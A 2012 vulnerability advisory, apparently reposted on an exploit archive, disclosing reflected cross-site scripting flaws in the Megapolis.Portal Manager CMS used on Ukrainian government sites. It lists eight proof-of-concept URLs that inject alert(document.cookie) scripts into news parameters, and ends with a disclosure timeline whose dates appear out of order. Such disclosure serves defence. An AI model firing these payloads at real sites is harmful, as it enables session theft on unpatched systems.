Megapolis.Portal Manager Cross Site Scripting

Megapolis.Portal Manager Cross Site Scripting: Posted Oct 7, 2012; Authored by MustLive; Megapolis.Portal Manager suffers from multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | e126ebb4ed51569934075ffa29804b50742b9235b045862315c576e058de3226; Download | Favorite | View

Megapolis.Portal Manager Cross Site Scripting

Hello list!

I want to warn you about multiple Cross-Site Scripting vulnerabilities in 
Megapolis.Portal Manager.

It's commercial CMS from Softline-IT (earlier Softline), which in 
particularly widespread among Ukrainian government sites (including 
ministry, parliament, two special services and many other web sites). In 
previous years I already wrote about multiple vulnerabilities in 
Megapolis.Portal Manager. These particular vulnerabilities were found at web 
sites of ministry and parliament.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Megapolis.Portal Manager.

Developer of Megapolis.Portal Manager declined to fix these vulnerabilities.

----------
Details:
----------

XSS (WASC-08):

http://site/control/news?date=04.07.2012'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/news?cat_id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left?cat_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left/news_left?cat_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left?from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left/news_left?from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left?to=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left/news_left?to=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

------------
Timeline:
------------

2012.07 - found multiple vulnerabilities at multiple government sites, 
including web sites of ministry and parliament. In addition to all those 
holes during 2006-2012.
2012.07 - informed admins of these sites.
2012.07.13 - announced at my site about holes in Megapolis.Portal Manager.
2010.07.16 - informed developers.
2010.07.16 - developers answered, that they don't care about these holes 
(and so about all web sites on their CMS) and will not fix them.
2010.07.19 - I've disagreed with developers' position and suggest to not 
decline the support of the government sites for which they were paid.
2012.10.06 - disclosed at my site (http://websecurity.com.ua/5949/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Megapolis.Portal Manager Cross Site Scripting

Megapolis.Portal Manager Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Megapolis.Portal Manager Cross Site Scripting

Share This

Megapolis.Portal Manager Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems